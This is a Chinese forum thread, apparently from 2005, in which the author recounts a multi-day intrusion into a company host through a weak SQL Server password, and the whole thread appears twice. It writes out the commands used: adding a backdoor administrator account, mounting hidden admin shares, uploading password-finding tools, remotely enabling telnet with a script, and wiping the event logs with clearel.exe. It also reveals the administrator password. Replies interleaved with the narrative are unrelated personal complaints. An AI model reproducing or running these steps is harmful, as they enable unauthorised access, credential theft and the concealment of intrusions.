我对X.X.49.120主机的友情入侵
一周前,由于多种原因(qq病毒,网站安全,机房学生密码被盗等待),
我开始注意网络安全问题.
首先,我总是拿自己内部的几台主机做试验,再推广到自己的网站,公司总部的几台机器,
也就是安全检查啦.
安全检查过程中,发现X.X.49.120主机安全漏洞太多,太严重,很容易地就进去了.
其后,我有意识地留下痕迹,让他们改进,下面是简要的过程.
第一步,就是扫描啦.用目前比较火的Flux4.7(流光)扫描,发现49.120漏洞太多,开了太多的 端口,最要命的是所sql server的密码是弱密码.
------
回复此文章
统一
我也自己扫描过,
无论是IIS,SPL SERVER 上等等,就连————等
都是很松散的,
不用说密码了,但是好在只有我一个人知道这些,也没有攻击我,索性,我可就大:姑娘一个人在屋不穿衣服——无所谓了。
你应该是早晨以前入侵的吧,但我这我肯定还管理员弱密码,我还没有改,因为还有些事,在有我重装的系统,SPL SERVER IIS 什么的,我早晨装的时候什么也没有装(包括不安全因素),现在你可以测到的也应该只能是管理员弱密码了,(其实,我这没有什么好怕黑的,其他电脑上有好多备份。)不过,我却很非常欢迎来尝试黑我这里!!
我非常 非常讨厌孤独、寂寞,
石家庄那些人走了以后,我好想他们
我感到现在很空虚!!
------
回复此文章
我不想再呆在这里了,只为这难受的寂寞。
我想走,
这里给的工资再多,我也不想留下来了,我打听一下北京那边有没有合适的机会或岗位,工资少点也无所谓,
我不想在这里呆长时间,我孤独的快要崩溃了!!
------
回复此文章
第二步,用sqlexec顺利进入主机,system 权限呢。
net user 看看。
已经有一个测试用户 123。那就改改他的密码吧。
net user 123 123 (改密码)
net localgroup administrators 123 /add (将用户123加入到管理员组)
提示成功。
后来证明,49.120玩了一个花招,administrators不是管理员组,而是普通用户组。
退出,以后再来。
第二天:
net use \\x.x.49.120\admin$ "123" /user:"123"
失败。奇怪呀。 net use \\x.x.49.l20\ipc$ "123" /user:"123" 成功。
123只是普通用户权限。
只好再用 sqlexec进入,
net user 123 , 123明明在administrators组中嘛,怎么不管用呢?
net user administrator ,administrator 在 Administrators 组中,原来如此。
但sqlexec中不能用“”,所以要把123加入到真正到管理员组中有些麻烦。
那就传一点工具吧。
可用到远程共享没开,那就开一个吧。
net share $tmp=c:
在本地端:net use z: \\x.x.49.120\tmp$ "123" /user:"123"
成功,copy 吧。
但是c:\winnt 不能够写。那就试试别的目录吧。
z:\> cd winnt\temp
md try
成功。
copy c:\hack\tools\findpass.exe z:\winnt\temp\try
copy c:\hack\tools\pulist.exe z:\winnt\temp\try
在利用sqlexec获得的远程shell,在49.120上
copy c:\winnt\temp\try\*.exe c:\winnt
成功。对了,system自然可以写。
cacls c:\winnt,噢,权限设得还挺严得呢。
以后再来吧,去别的地方遛遛。
第三天,用sqlexec 上去,
pulist
administrator 今天运行啦netspy,搞监视呀。
但你为什么是:legend
唉,这么简单的密码,真让人失望。
net user administrator
嘿,还是几个小时前改的呢,要改也别改这么弱的呀。
闪人。
第四天,sqlexec连不上,啊,关了sql server啦。
怎么办?
只好动用adminstrator啦
net use \\x.x.49.120\admin$ "legend" /user:"administrator"
失败,远程管理被禁止啦。
net user \\x.x.49.120 "123" /user:"123”
成功。
net view \\x.x.49.120
只有g盘被共享吧。
试试能够写吗?不能。估计是光驱。
换administrator试试。
------
回复此文章
用administrator也不能写,没有可写的共享。
怎么办?没有shell啦。
psexec \\x.x.49.120 -c cmd.exe
远程管理给关啦。真是糟糕。
没有路子了吗?
想想。
20秒钟,有啦。试试vbs(就是vb教本)
cscript rtcs.vbe x.x.49.120 administrator legend 0 23
给他开个telnet吧。
成功。
telnet x.x.49.120 23 成功。
login: administrator
password:legend
进去啦。
关了共享,那就打开吧。
net share tmp$=c:
在客户端,
net use z: \\x.x.49.120\tmp$ "legend" /user:"administrator"
在资源管理器中,看看,噢,它的c:盘成了我的z:啦。
c:\winnt文件夹内,能够建吗?可以。能够删除吗?可以。
当然,我是管理员嘛。被管理员关闭的远程管理又被我这个临时的管理员打开啦。
再看看它的电脑里又什么吧,好像没有多少东西,走人。
走之前, 传一个clearel.exe清除日志吧。
既然彻底搞定了,以后就不来啦。公司总部的机器,就不用留后门啦。
ms的系统真没意思,以后要玩就找个unix玩玩吧。
------
回复此文章
ipc$
这东西我也玩过,没什么了不起,
你的试验是在几天以前的,
对付这方法我也有好多,不要高兴的那么早,好不,不过暂时网关的计算机还是管理员弱密码,因为好几个人用,我也不好给改个别的,否则,想功入我这里也,不是轻而易举的。
你那么确定我这里都不值得你一攻,可大错了,我有好多好多方法,是让你进不来的。
网关那台电脑现在不是我用的那台电脑了,否则将不是很顺利了!!
------
回复此文章
重装了台别的电脑,作网关,没装IIS,SPL,等,
现在别人用着,要是我那台电脑,有的拼!
------
回复此文章
想玩UNIX,好说,我这里有虚拟UNIX操作系统安装软件,
来我这里拿,我的内网IP为:192.168.0.4 有没有办法拿的到啊?
------
回复此文章
我在用的完全和unix一样,黑的也是那个,宇ms无关,不好拿啊?。
网上去找没意思,来我这拿!!欢迎,欢迎!
我开始注意网络安全问题.
首先,我总是拿自己内部的几台主机做试验,再推广到自己的网站,公司总部的几台机器,
也就是安全检查啦.
安全检查过程中,发现X.X.49.120主机安全漏洞太多,太严重,很容易地就进去了.
其后,我有意识地留下痕迹,让他们改进,下面是简要的过程.
第一步,就是扫描啦.用目前比较火的Flux4.7(流光)扫描,发现49.120漏洞太多,开了太多的 端口,最要命的是所sql server的密码是弱密码.
------
回复此文章
统一
我也自己扫描过,
无论是IIS,SPL SERVER 上等等,就连————等
都是很松散的,
不用说密码了,但是好在只有我一个人知道这些,也没有攻击我,索性,我可就大:姑娘一个人在屋不穿衣服——无所谓了。
你应该是早晨以前入侵的吧,但我这我肯定还管理员弱密码,我还没有改,因为还有些事,在有我重装的系统,SPL SERVER IIS 什么的,我早晨装的时候什么也没有装(包括不安全因素),现在你可以测到的也应该只能是管理员弱密码了,(其实,我这没有什么好怕黑的,其他电脑上有好多备份。)不过,我却很非常欢迎来尝试黑我这里!!
我非常 非常讨厌孤独、寂寞,
石家庄那些人走了以后,我好想他们
我感到现在很空虚!!
------
回复此文章
我不想再呆在这里了,只为这难受的寂寞。
我想走,
这里给的工资再多,我也不想留下来了,我打听一下北京那边有没有合适的机会或岗位,工资少点也无所谓,
我不想在这里呆长时间,我孤独的快要崩溃了!!
------
回复此文章
第二步,用sqlexec顺利进入主机,system 权限呢。
net user 看看。
已经有一个测试用户 123。那就改改他的密码吧。
net user 123 123 (改密码)
net localgroup administrators 123 /add (将用户123加入到管理员组)
提示成功。
后来证明,49.120玩了一个花招,administrators不是管理员组,而是普通用户组。
退出,以后再来。
第二天:
net use \\x.x.49.120\admin$ "123" /user:"123"
失败。奇怪呀。 net use \\x.x.49.l20\ipc$ "123" /user:"123" 成功。
123只是普通用户权限。
只好再用 sqlexec进入,
net user 123 , 123明明在administrators组中嘛,怎么不管用呢?
net user administrator ,administrator 在 Administrators 组中,原来如此。
但sqlexec中不能用“”,所以要把123加入到真正到管理员组中有些麻烦。
那就传一点工具吧。
可用到远程共享没开,那就开一个吧。
net share $tmp=c:
在本地端:net use z: \\x.x.49.120\tmp$ "123" /user:"123"
成功,copy 吧。
但是c:\winnt 不能够写。那就试试别的目录吧。
z:\> cd winnt\temp
md try
成功。
copy c:\hack\tools\findpass.exe z:\winnt\temp\try
copy c:\hack\tools\pulist.exe z:\winnt\temp\try
在利用sqlexec获得的远程shell,在49.120上
copy c:\winnt\temp\try\*.exe c:\winnt
成功。对了,system自然可以写。
cacls c:\winnt,噢,权限设得还挺严得呢。
以后再来吧,去别的地方遛遛。
第三天,用sqlexec 上去,
pulist
administrator 今天运行啦netspy,搞监视呀。
但你为什么是:legend
唉,这么简单的密码,真让人失望。
net user administrator
嘿,还是几个小时前改的呢,要改也别改这么弱的呀。
闪人。
第四天,sqlexec连不上,啊,关了sql server啦。
怎么办?
只好动用adminstrator啦
net use \\x.x.49.120\admin$ "legend" /user:"administrator"
失败,远程管理被禁止啦。
net user \\x.x.49.120 "123" /user:"123”
成功。
net view \\x.x.49.120
只有g盘被共享吧。
试试能够写吗?不能。估计是光驱。
换administrator试试。
------
回复此文章
用administrator也不能写,没有可写的共享。
怎么办?没有shell啦。
psexec \\x.x.49.120 -c cmd.exe
远程管理给关啦。真是糟糕。
没有路子了吗?
想想。
20秒钟,有啦。试试vbs(就是vb教本)
cscript rtcs.vbe x.x.49.120 administrator legend 0 23
给他开个telnet吧。
成功。
telnet x.x.49.120 23 成功。
login: administrator
password:legend
进去啦。
关了共享,那就打开吧。
net share tmp$=c:
在客户端,
net use z: \\x.x.49.120\tmp$ "legend" /user:"administrator"
在资源管理器中,看看,噢,它的c:盘成了我的z:啦。
c:\winnt文件夹内,能够建吗?可以。能够删除吗?可以。
当然,我是管理员嘛。被管理员关闭的远程管理又被我这个临时的管理员打开啦。
再看看它的电脑里又什么吧,好像没有多少东西,走人。
走之前, 传一个clearel.exe清除日志吧。
既然彻底搞定了,以后就不来啦。公司总部的机器,就不用留后门啦。
ms的系统真没意思,以后要玩就找个unix玩玩吧。
------
回复此文章
ipc$
这东西我也玩过,没什么了不起,
你的试验是在几天以前的,
对付这方法我也有好多,不要高兴的那么早,好不,不过暂时网关的计算机还是管理员弱密码,因为好几个人用,我也不好给改个别的,否则,想功入我这里也,不是轻而易举的。
你那么确定我这里都不值得你一攻,可大错了,我有好多好多方法,是让你进不来的。
网关那台电脑现在不是我用的那台电脑了,否则将不是很顺利了!!
------
回复此文章
重装了台别的电脑,作网关,没装IIS,SPL,等,
现在别人用着,要是我那台电脑,有的拼!
------
回复此文章
想玩UNIX,好说,我这里有虚拟UNIX操作系统安装软件,
来我这里拿,我的内网IP为:192.168.0.4 有没有办法拿的到啊?
------
回复此文章
我在用的完全和unix一样,黑的也是那个,宇ms无关,不好拿啊?。
网上去找没意思,来我这拿!!欢迎,欢迎!
hofman
2005-11-19 23:10:11
评论:0
阅读:823
引用:0